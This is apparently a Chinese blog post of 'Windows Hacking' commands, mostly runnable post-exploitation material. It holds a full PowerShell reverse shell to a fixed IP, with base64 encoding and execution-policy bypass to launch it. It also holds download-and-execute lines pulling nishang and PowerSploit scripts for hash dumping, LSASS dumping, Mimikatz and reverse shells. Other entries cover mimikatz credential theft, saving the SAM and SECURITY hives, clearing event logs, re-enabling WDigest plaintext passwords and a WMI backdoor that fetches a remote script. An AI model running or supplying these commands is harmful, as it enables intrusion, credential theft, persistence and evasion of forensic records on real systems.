Windows Hacking

PowerShell 反弹shell

$client = New-Object System.Net.Sockets.TCPClient("192.168.1.2",55555);$stream = $client.GetStream();[byte[]]$bytes = 0..255|%{0};$sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + "`n");$stream.Write($sendbytes,0,$sendbytes.Length);while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Powershell Base64编码

$Text = '$client = New-Object System.Net.Sockets.TCPClient("192.168.1.2",55555);$stream = $client.GetStream();[byte[]]$bytes = 0..255|%{0};$sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + "`n");$stream.Write($sendbytes,0,$sendbytes.Length);while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
$EncodedText =[Convert]::ToBase64String($Bytes)
$EncodedText > 1.txt

cat power.txt | iconv --to-code UTF-16LE |base64 (Linux)

powershell -ep bypass -NoLogo -NonInteractive -NoProfile -enc "1.txt 代码"
powershell -ep bypass -NoLogo -NonInteractive -NoProfile -enc {base64 代码}

VBS 下载

Set args = Wscript.Arguments
Set http = CreateObject("WinHttp.WinHttpRequest.5.1")
http.Open "GET", args(0), False
http.Send
If http.Status <> 200 Then
    WScript.Echo "FAILED : HTTP Status " & http.Status
    WScript.Quit 1
End If
Set adoStream = CreateObject("ADODB.Stream")
adoStream.Open
adoStream.Type = 1
adoStream.Write http.ResponseBody
adoStream.Position = 0
adoStream.SaveToFile args(1),2
adoStream.Close

查询远程连接记录

reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default"
reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/3gstudent/List-RDP-Connections-History/master/ListAllUsers.ps1');

PowerShell下载

$client = new-object System.Net.WebClient
$client.DownloadFile('http://www.qq.com/robots.txt','D:\robots.txt')
powershell -Command "$client = New-Object 'System.Net.WebClient';$client.DownloadFile('http://download.sysinternals.com/files/PSTools.zip','D:\PSTools.zip')"

日志处理

wevtutil cl "windows powershell"
wevtutil cl "security"
wevtutil cl "system"
wmic nteventlog where LogfileName="Security" call cleareventlog
Get-EventLog "Security" -newest 100 | Where -FilterScript {$_.EventID -eq 4624 -and $_.ReplacementStrings[4].Length -gt 10}
Get-EventLog "Security" -newest 100 | Where -FilterScript {$_.EventID -eq 4624 -and $_.ReplacementStrings[4].Length -gt 10}  | Select-Object timegenerated,@{Name='TargetUserName'; Expression={$_.ReplacementStrings[5]}}, @{Name='WorkstationName'; Expression={$_.ReplacementStrings[1] -replace '\$$'}},@{Name='IpAddress';Expression={$_.ReplacementStrings[-2]}}
powershell -Command "Get-EventLog 'Security' -newest 100 | Where -FilterScript {$_.EventID -eq 4624}|select TimeGenerated

查看启动项

wmic startup list brief
wmic startup get Command, User

获取已经安装的更新

wmic qfe get HotFixID, description, InstalledOn

查看网卡信息

wmic nicconfig where IPEnabled='true' get DefaultIPGateway,DHCPServer,IPAddress,MacAddress

进程信息

wmic process list brief

批量检测局域网存活的主机

for /L %I in (1,1,254) DO @ping -n 1 192.168.1.%I | findstr "TTL=128"

查看本地用户

wmic useraccount list brief
powershell Get-Childitem env:username

获取服务信息

wmic service where State="Running" list brief

用户设置

net user miked /time:M-F,08:00-17:00
net user miked /time:M-F,8AM-5PM
允许用户miked周一到周五早上8点到下午5点登陆系统(M-F Monday-Friday)

抓取管理密码

mimikatz.exe privilege::debug sekurlsa::logonpasswords exit
mimikatz.exe privilege::debug sekurlsa::logonpasswords exit | findstr "Username Password" | findstr /i /V "null local"
mimikatz.exe sekurlsa::minidump lsass.dmp sekurlsa::logonPasswords full  

reg save hklm\sam d:\sam.hive
reg save hklm\system d:\system.hive
reg save hklm\security d:\security.hive

查看本机任务计划

schtasks /query | findstr Ready

执行PowerShell的方式

方法1:powershell IEX (New-Object Net.WebClient).DownloadString('http://xxxxx/xxx.ps1');
方法2:        Get-ExecutionPolicy 
            Set-ExecutionPolicy Unrestricted
导入模块:
Import-Module .\xxxxx.ps1 或 . ".\xxx.ps1"

PowerShell其他脚本

获取hash
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Get-PassHashes.ps1');Get-PassHashes
dump
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); "Get-Process lsass | Out-Minidump -DumpFilePath D:\tmp"
获取明文-Mimikatz
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz
反弹Shell-TCP
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1')
反弹Shell-UDP
IEX (New-Object Net.WebClient).DownloadString('https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1')
反弹Shell-icmp:
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellIcmp.ps1')

更新KB2871997补丁后,可禁用Wdigest Auth强制系统的内存不保存明文口令,此时mimikatz和wce均无法获得系统的明文口令
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest -Name UseLogonCredential -Type DWORD -Value 1

WMI Backdoor

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/xorrior/RandomPS-Scripts/master/WMIBackdoor.ps1')
Set-WMIBackdoor -URL "http://xxx/shell.ps1" -Name "PWN" -TimeExecTrigger -TimeExecTime 300 #每5分钟执行一次
Remove-WMIBackdoor PWN

打包/解压

powershell.exe -nologo -noprofile -command "& { Add-Type -A 'System.IO.Compression.FileSystem'; [IO.Compression.ZipFile]::ExtractToDirectory('x.zip', 'bar'); }"
powershell.exe -nologo -noprofile -command "& { Add-Type -A 'System.IO.Compression.FileSystem'; [IO.Compression.ZipFile]::CreateFromDirectory('foo', 'bar.zip'); }"
"C:\Program Files (x86)\WinRAR\Rar.exe" a -k -r -s -m3 d:\xxx.zip E:\www\

查找文件

powershell.exe -nologo -noprofile -command "Get-ChildItem C:\inetpub\logs\LogFiles\ -recurse *.log"
powershell.exe -nologo -noprofile -command "Get-ChildItem D:\ | ForEach-Object -Process{ if($_ -is [System.IO.FileInfo] -and ($_.CreationTime -ge [System.DateTime]::Today)) { Write-Host($_.name,$_.CreationTime); } }"

删除,复制文件目录

XCOPY D://www D://backup//  /S /E /Y
rd /s /q 目录
del /f /s /q 文件
Remove-Item 文件

查看IIS虚拟机目录

c:/Windows/System32/inetsrv/appcmd list sites
c:/Windows/System32/inetsrv/appcmd list VDIR

标签: none

添加新评论